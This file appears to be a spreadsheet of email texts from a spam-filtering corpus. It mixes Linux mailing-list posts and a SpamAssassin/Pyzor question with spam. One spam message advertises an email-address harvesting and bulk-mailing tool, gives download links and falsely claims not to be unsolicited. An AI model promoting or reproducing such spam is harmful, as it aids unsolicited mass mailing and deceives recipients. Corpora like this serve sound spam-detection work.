     Ros: Would you care to estimate?
     Guil: Difficult to say, really&amp;#8212;some kings tend to be amnesiac, others 
     I suppose&amp;#8212;the opposite, whatever that is...
     Ros: Yes&amp;#8212;but&amp;#8212;
     Guil: Elephantine... ?
     Ros: Not how long&amp;#8212;how much?
     Guil: _Retentive_&amp;#8212;he's a very retentive king, a royal retainer...
     Ros: What are you playing at?
     Guil: Words, words. They're all we have to go on. 
 [1] http://www.themorningnews.org/archives/stories/rosencrantz_joshua.shtml
 [2] http://diveintomark.org/archives/2002/04/19.html#alan_cooper_speaks
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Spamassassin with Pyzor
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0009_01C25B03.83C4FDB0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 I installed Spamassassin 2.41 with Razor V2 the other day and it has =
 been working great. I decided to add Pyzor last night and I got that =
 installed successfully (I think, no errors). I am using spamd and I see =
 where it periodically spawns off a pyzor process; however nothing has =
 been detected as spam by Pyzor under Spamassassin. It has been running =
 for almost half a day now on a 5,000 user mail server - so to me the =
 odds of something being caught by it should be high. I run spamd as =
 follows:
 spamd -d -H
 and all my users home directories have a .pyzor directory with the =
 server listed under it.
 I setup a test procmail recipe that just invokes pyzor check and not =
 spamc to see if in fact pyzor alone catches any spam -  I just set this =
 up so no results yet. Here is what I get when I check connectivity to =
 the pyzor server:
  pyzor -d ping
 sending: 'User: anonymous\nTime: 1031921041\nSig: =
 161c547ac6248589910f97b1b5cd37e6dffc8eaf\n\nOp: ping\nThread: 14733\nPV: =
 2.0\n\n'
 received: 'Thread: 14733\nCode: 200\nDiag: OK\nPV: 2.0\n\n'
 167.206.208.233:24442   (200, 'OK')
 Any help/examples would be appreciated. Thanks! BTW, keep up the great =
 work Spamassassin team!
 Nick
 ---
 Outgoing mail is certified Virus Free.
 Checked by AVG anti-virus system (http://www.grisoft.com).
 Version: 6.0.386 / Virus Database: 218 - Release Date: 9/9/2002
 ------=_NextPart_000_0009_01C25B03.83C4FDB0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;I installed Spamassassin 2.41&amp;nbsp;with =
 Razor V2=20
 the other day and it has been working great. I decided to add Pyzor last =
 night=20
 and I got that installed successfully (I think, no errors). I am using =
 spamd and=20
 I see where it periodically spawns off a pyzor process; however nothing =
 has been=20
 detected as spam by Pyzor under Spamassassin. It has been running for =
 almost=20
 half a day now on a 5,000 user mail server - so to me the odds of =
 something=20
 being caught by it should be high. I run spamd as follows:&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;spamd -d -H&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;and all my users home directories have =
 a .pyzor=20
 directory with the server listed under it.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;I setup a test procmail recipe that =
 just invokes=20
 pyzor check and not spamc to see if in fact pyzor alone catches any spam =
 -=20
 &amp;nbsp;I just set this up so no results yet. Here is what I get when I =
 check=20
 connectivity to the pyzor server:&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&amp;nbsp;pyzor -d ping&lt;BR&gt;sending: 'User:=20
 anonymous\nTime: 1031921041\nSig:=20
 161c547ac6248589910f97b1b5cd37e6dffc8eaf\n\nOp: ping\nThread: 14733\nPV: =
 2.0\n\n'&lt;BR&gt;received: 'Thread: 14733\nCode: 200\nDiag: OK\nPV:=20
 2.0\n\n'&lt;BR&gt;167.206.208.233:24442&amp;nbsp;&amp;nbsp; (200, 'OK')&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Any help/examples would be appreciated. =
 Thanks!=20
 BTW, keep up the great work Spamassassin team!&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Nick&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;BR&gt;---&lt;BR&gt;Outgoing mail is certified =
 Virus=20
 Free.&lt;BR&gt;Checked by AVG anti-virus system (&lt;A=20
 href=3D"http://www.grisoft.com"&gt;http://www.grisoft.com&lt;/A&gt;).&lt;BR&gt;Version: =
 6.0.386 /=20
 Virus Database: 218 - Release Date: 9/9/2002&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0009_01C25B03.83C4FDB0--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</si>
  <si>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Re: [ILUG] gargnome &amp; sawfish..
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
 &gt;  I decided to try out GarGnome, to see what gnome2 looks like. It's
 &gt; pretty, I'll give it that.
 &gt; 
 &gt;  However, there seemed to be loads of bugs - sawfish threw wobblers all
 &gt; over the place, so I tryed out metacity - which doesn't have a GUI
 &gt; configurator, and arsed if I'm going back to the fvwm days when you had to
 &gt; set settings by hand, without an idea what the values looked like.
 Have you tried gconf-editor? It's a GUI front-end to gconf
 settings (and metacity has it's settings handled by gconf, like
 all good gnome2 apps). It's true there's no designated metacity
 configurator - but the whole point of metacity is to have
 reasonable defaults, and thus get away from the need for settings
 altogether, and have the window manager be not in the way (as so
 many are).
 As to the sawfish issue, no idea, sorry - are you sure that
 gnome2's panel handles 1.4 applets at all?
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 11:28:11AM +0200, David Neary wrote:
 &gt; For example, say I have a company, and sales@company.com,
 &gt; info@company.com and tech@company.com arrive in the same mailbox.
 &gt; I don't want to reply to sales@company.com mails with the From:
 &gt; set to dave@company.com, I would like the mail to come from
 &gt; sales@company.com.
 &gt; 
 &gt; Is there any way to do this? Bearing in mind that mail can arrive
 &gt; with my email in the To or Cc fields (and Bcc?), and it might be
 &gt; buried in a couple of dozen other recipients...
 i sort my mail into folders using procmail.  so typically i'm in the
 ilug folder for ilug mail, the doolin folder for doolin mail, etc.
 so i use folder-hooks to accomplish that.  as an example (i do line
 wrapping to keep it less then 80 chars long - spacing is important):
 folder-hook . "my_hdr From: kevin lyda &lt;kevin@ie.suberic.net&gt;;"\
 "my_hdr X-GPG-Fingerprint: 9C1D 16F4 11F1 6BD2 933C  048D ACC7 9840 89D0 7646;"\
 "set pgp_sign_as=0x89D07646;set signature=~/.signature;"\
 "set folder=~/Mail;set record=~/Mail/outbox;set postponed=~/Mail/postponed"
 folder-hook /(alphyra|Alphyra/[^.].*) \
 "my_hdr From: kevin lyda &lt;kevin@alphyra.com&gt;;my_hdr X-GPG-Fingerprint: "\
 "088E 2BC4 381E 990A 1E0E  1DA0 4D44 99EF 20E6 38A0;"\
 "set pgp_sign_as=0x20E638A0;set signature=~/.signature.d/itg.sig;"\
 "set folder=~/Mail/Alphyra;set record=~/Mail/Alphyra/outbox;"\
 "set postponed=~/Mail/Alphyra/postponed"
 you could also do this with send hooks.  i use them to tweak gpg settings:
 send-hook .			"unset pgp_autoencrypt;set pgp_autosign"
 send-hook (ilug|webdev|social)@linux.ie	\
 				"unset pgp_autosign;unset pgp_autoencrypt"
 and then i have an include file with all people who have keys.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</si>
  <si>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ADV:  Harvest lots of E-mail addresses quickly !
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear zzzz =2C
 =3CBODY bgColor=3D#ffccff=3E
 =3CTABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D475=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD align=3Dmiddle vAlign=3Dtop=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E=3CBR=3E
 =3CTABLE=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E
     =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=2290%=22=3E=3CFONT color=3D#ff0000 
       face=3D=22Arial Black=22 
       size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B Want    
       To Harvest A Lot Of Email&amp;nbsp=3B&amp;nbsp=3B Addresses In A Very Short Time=3F=3C=2FFONT=3E    
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial size=3D4=3EEasy Email    
       Searcher=3C=2FFONT=3E=3CFONT color=3D#ff00ff face=3DArial size=3D4=3E&amp;nbsp=3B is&amp;nbsp=3B    
       a&amp;nbsp=3B powerful&amp;nbsp=3B Email&amp;nbsp=3B software&amp;nbsp=3B&amp;nbsp=3B that&amp;nbsp=3B    
       harvests general Email lists from mail servers&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3CFONT    
       color=3D#0000ff face=3DArial size=3D4=3EEasy Email Searcher =3C=2FFONT=3E=3CFONT    
       color=3D#ff00ff face=3DArial size=3D4=3Ecan get 100=2C000 Email=3C=2FFONT=3E=3C=2FB=3E =3CFONT    
       color=3D#ff00ff face=3DArial size=3D4=3E=3CB=3Eaddresses directly from the Email    
       servers in only one hour!&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E   
       =3CUL=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email    
         Searcher=3C=2FFONT=3E=3C=2FB=3E is a 32 bit Windows Program for e-mail marketing=2E It    
         is intended for easy and convenient search large e-mail address lists    
         from mail servers=2E The program can be operated on Windows 95=2F98=2FME=2F2000    
         and NT=2E=3C=2FFONT=3E    
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email    
         Searcher=3C=2FFONT=3E =3C=2FB=3Esupport multi-threads =28up to 512    
         connections=29=2E=3C=2FFONT=3E    
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email    
         Searcher=3C=2FFONT=3E=3C=2FB=3E has the ability&amp;nbsp=3B to reconnect to the mail    
         server if the server has disconnected and continue the searching at the    
         point where it has been interrupted=2E=3C=2FFONT=3E    
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email    
         Searcher=3C=2FFONT=3E=3C=2FB=3E has an ergonomic interface that is easy to set up    
         and simple to use=2E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E   
       =3CP=3E=A1=A1=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3EEasy Email Searcher is an email    
       address searcher and bulk e-mail sender=2E It can verify more than 5500    
       email addresses per minute at only 56Kbps speed=2E It even allows you send    
       email to valid email address while searching=2E You can save the searching    
       progress and load it to resume work at your convenience=2E All you need to    
       do is just input an email address=2C and press the =22Search=22    
       button=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E   
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3E=3CBR=3E=3C=2FFONT=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CI=3EClick The Following Link To    
       Download The Demo =3A=3C=2FI=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   
       href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=22=3EDownload Site    
       1=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B=3C=2FFONT=3E=3Cfont face=3D=22Trebuchet MS=22=3E=3CFONT color=3D#ff0000 size=3D4=3E 
       =28 OR You Can Send Email To&amp;nbsp=3B =3C=2FFONT=3E=3C=2Ffont=3E=3Cfont size=3D=224=22 color=3D=22#0000FF=22 face=3D=22Arial=22=3E130=4095951=2Ecom=3C=2Ffont=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E&amp;nbsp=3B 
       For More Information About&amp;nbsp=3B This Program =29=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   
       href=3D=22http=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=22=3EDownload Site    
       2=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3C=2FB=3E=A1=A1=3CFONT color=3D#0000a0 face=3DArial 
       size=3D3=3E=3CSTRONG=3EIf&amp;nbsp=3B you can not download this program =2C&amp;nbsp=3B please    
       copy the following link into your URL =2C and then click =22 Enter=22 on your    
       Computer Keyboard=2E=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E   
       =3CP=3E=3CFONT size=3D2=3E=3CFONT color=3D#0000a0 face=3DArial size=3D3=3E=3CSTRONG=3EHere is the    
       download links=3A=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E   
       =3CDIV=3E   
       =3CP=3Ehttp=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=3C=2FP=3E   
       =3CP=3Ehttp=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=3C=2FP=3E=3C=2FFONT=3E=3C=2FDIV=3E   
       =3CP=3E=3C=2FP=3E=3C=2FTD=3E   
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E   
   =3CTR=3E   
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E   
     =3CTD bgColor=3D#0f95de width=3D=2290%=22=3E=3CFONT color=3D#ffffff    
       face=3D=22Verdana=2C Tahoma=2C Helvetica=2C SansSerif=22    
       size=3D1=3E=3CB=3EDisclaimer=3A=3C=2FB=3E=3CBR=3EWe are strongly against continuously sending    
       unsolicited emails to those who do not wish to receive our special    
       mailings=2E We have attained the services of an independent 3rd party to    
       overlook list management and removal services=2E This is not unsolicited    
       email=2E If you do not wish to receive further mailings=2C please click this    
       link =3CA href=3D=22 mailto=3Aremoval=40btamail=2Enet=2Ecn =22    
       target=3D=5Fblank=3E=3CFONT    
       color=3D#fdd32a=3E=3CB=3Emailto=3Aremoval=40btamail=2Enet=2Ecn   
       =3C=2FB=3E=3C=2FFONT=3E=3C=2FA=3E=2E&amp;nbsp=3B=3C=2FFONT=3E=3CB=3E=3CFONT class=3Ddisclaimer color=3D#000080   
       face=3DArial=3E=3CBR=3EThis message is a commercial advertisement=2E It is compliant   
       with all federal and state laws regarding email messages including the   
       California Business and Professions Code=2E We have provided the subject   
       line =22ADV=22 to provide you notification that this is a commercial   
       advertisement for persons over 18yrs old=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FTD=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E  
 =3CBR=3E 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Alan Cox doesn't like 2.5 so far!
</t>
  </si>
  <si>
    <t xml:space="preserve">Yikes, hope he's not serious!
 -------- Original Message --------
 Subject: Re: [bug, 2.5.29, IDE] partition table corruption?
 Date: 08 Aug 2002 14:23:53 +0100
 From: Alan Cox &lt;alan@lxorguk.ukuu.org.uk&gt;
 To: martin@dalecki.de
 [IDE specific argument snipped]
 Thank you for reminding me why I've given up on the 2.5 kernel ever
 working. Fortunately free software is self correcting so the tree can be
 forked into something workable
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Brian O'Donoghue wrote a code fragment:
 &gt; For(a=0;a&lt;strlen(somestring);a++)
 &gt; {
 &gt;  some_thing_goes_here();
 &gt;
 &gt;  if(b=strlen(somestring)-4)
 &gt; do_something;
 &gt;
 &gt; };
 Unfortunately strlen is a relatively expensive operation. If you are using
 C++ this is not such a big issue as string.length() can be declared const.
 So long as you do not modify the string object, the compiler can do the
 caching for you.
 I do not think this is possible in C, though?
 You could write the same code fragment as:
 ============================
 for(a=0,l=strlen(somestring);a&lt;l;a++)
 {
     some_thing_goes_here();
     if(b==l-4)
         do_something();
 }
 ============================
 Note my previous point: if some_thing_goes_here() or do_something() are very
 long functions, then there is no real need to optimise this code.
 Also, for string manipulation, a much better approach would be:
 ============================
 char c;
 char* p;
 for(p=somestring,(c=*p)!=0;p++)
 {
     some_thing_goes_here();
     if(*(p+4)==0)
         do_something();
 }
 ============================
 This works because C used \0 terminated strings. It improves performance
 because you always have a pointer to the character instead of having to do
 array manipulation. Strictly speaking, the variable c is not required as
 most compilers are smart enough to store *p in a register.
 The problem is that this uses pointer arithmetic, which can make the code
 illegable if not managed carefully. Which is one of the reasons I prefer
 Java for most programming tasks. :)
 - Matthew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</si>
  <si>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&gt; When I get a box I don't want any of that integrated chipset crap 
 &gt; whether its for winblows or linux. Its just like IBM (mwave 
 Then buy a Dimension. The alternative is there.
 &gt; However if you want that box for linux and you have a life 
 &gt; and you dont
 &gt; want to spend a week of it fucking arround and googling to 
 &gt; get that box
 &gt; working properly be damned sure you do your research before 
 &gt; you buy it.
 Absolutely, to buy a machine and hope later that linux will take to it is
 beyond naive. There is a lot of support, mailing lists, web sites, etc that
 will help people decide if Linux is going to like a box or not, use them.
 &gt; (without a net connection/56k modem). And the machine has got 
 &gt; this crap
 &gt; windoze
 &gt; only hardware and eventually you shrug in frustration and they say 
 Or its a television set with one of those wireless keyboards :)
 &gt; When Dell were squabbling with Windows and it looked as 
 I must have misssed that bit ? I don't recall any "squabble" with Microsoft
 when Dell decided to expand their product range to include RH.
 &gt; a Dell/Redhat alliance my Inspiron 4000 was produced ... it 
 There *IS* a Dell/Redhat alliance. It lead to a shocking amount of Dell
 systems being easily configurable with RHL.
 &gt; now that dell doesn't give a shit about linux all their new 
 &gt; cheap boxes are
 &gt; linux 
 &gt; incompatable in small ways.
 You make it sound that incompatibility has been deliberately built into the
 new systems. The products that any company sell with linux installed will be
 easily reinstalled with linux. The products sold with Windows only may not
 be. Having said that I've never found a Dell system it was impossible to put
 RH on. I have had one or two headaches in the past doing it, though.
 steve
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dont waste your TIME!!! Why?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------_NextPart_4756979720
 Content-Type: text/plain; charset="ISO-8859-1"
 Content-Transfer-Encoding: QUOTED-PRINTABLE
 Looking for Property in Spain?
 Don_t waste your Time!
 That is what most people do when they look for property using property web sites. Why?
  Because many of the properties that are advertised on them have already been sold!
  You could waste precious time looking for and inquiring after properties that have already been SOLD!
  How Frustrating!!!
 The property market is moving very fast in Spain and frankly many estate agents do not have the time to update their web sites.
 What you need is a company that can find you property that is actually for sale and can present you with a selection of current properties that specifically fit your requirements.
 Just think of how much time and effort that would save you!
  Property finders Spain 
 can do just that!
 We are here in Spain and have a many ways of looking for property that has just arrived on the market, even looking in the local papers! 
 So while others are chasing properties or new projects that are no longer for sale you can be viewing property that has just arrived on the market!
 Simply fill in the form below and press the send button and we will do all of the hard work for you. 
 Once we receive your requirements we will immediately begin looking for current properties just right for you.
 Property finders Form
 Property Type Villa Apartment Town House New building projects Plot of Land
 Number of bedrooms 1 2 3 4 5 6
 Location
 Do you want a Sea View? Yes No Don`t care
 Mountain View Yes No Don`t care
 A property in the country
 A Property in or near a city
 Pool Yes, No Yes No Don`t care
 Price Range
 Are you planning to come 
 to Spain in the next three months Yes, No? Yes No
 Name
 E mail address
 Telephone Number
 Country Code
 Let us find a property for you!
 ------_NextPart_4756979720
 Content-Type: text/html; charset="ISO-8859-1"
 Content-Transfer-Encoding: QUOTED-PRINTABLE
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-1252"&gt;
 &lt;title&gt;Looking for Property in Spain&lt;/title&gt;
 &lt;style&gt;
 &lt;!--
 h1
 	{margin-bottom:.0001pt;
 	text-align:center;
 	page-break-after:avoid;
 	font-size:28.0pt;
 	font-family:"Times New Roman";
 	margin-left:0cm; margin-right:0cm; margin-top:0cm}
 h2
 	{margin-bottom:.0001pt;
 	text-align:center;
 	page-break-after:avoid;
 	font-size:28.0pt;
 	font-family:"Times New Roman";
 	font-weight:normal;
 	font-style:italic; margin-left:0cm; margin-right:0cm; margin-top:0cm}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;BODY&gt;
 &lt;TABLE id=3DAutoNumber1 style=3D"BORDER-COLLAPSE: collapse" borderColor=3D#111111 
 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%"&gt;&lt;IMG height=3D92 
       src=3D"http://www.secure-siteserver.com/flyer/logo2.jpg" width=3D757 
     border=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE id=3DAutoNumber2 style=3D"BORDER-COLLAPSE: collapse" borderColor=3D#111111 
 height=3D83 cellSpacing=3D0 cellPadding=3D0 width=3D"101%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"3%" bgColor=3D#0066cc height=3D21&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=3D"74%" bgColor=3D#0066cc height=3D21&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=3D"23%" bgColor=3D#0066cc height=3D21&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=3D"2%" bgColor=3D#0066cc height=3D21&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"3%" bgColor=3D#0066cc height=3D36&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"74%" height=3D36&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;B&gt;&lt;SPAN style=3D"FONT-SIZE: 28pt; COLOR: blue"&gt;Looking for 
       Property in Spain?&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt; COLOR: red; FONT-FAMILY: Arial"&gt;&lt;FONT 
       face=3D"Arial Black"&gt;Don_t waste your Time!&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;That is what 
       most people do when they look for property using property web sites. 
       &lt;B&gt;&lt;I&gt;&lt;SPAN style=3D"COLOR: red"&gt;Why?&lt;/SPAN&gt;&lt;/I&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;&amp;nbsp;Because 
       many of the properties that are advertised on them have&lt;B&gt; &lt;I&gt;already been 
       sold!&lt;/I&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;FONT style=3D"FONT-SIZE: 17pt" 
       face=3DArial&gt;You could waste precious time looking for and inquiring after 
       properties that &lt;B&gt;have already been SOLD!&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#ff0000&gt;&lt;B&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&amp;nbsp;&lt;FONT face=3D"Arial Black"&gt;How 
       Frustrating!!!&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;The property 
       market is moving very fast in Spain and frankly many estate agents do not 
       have the time to update their web sites.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;What you need 
       is a company that can find you property that is actually for sale and can 
       present you with a selection of current properties that specifically fit 
       your requirements.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
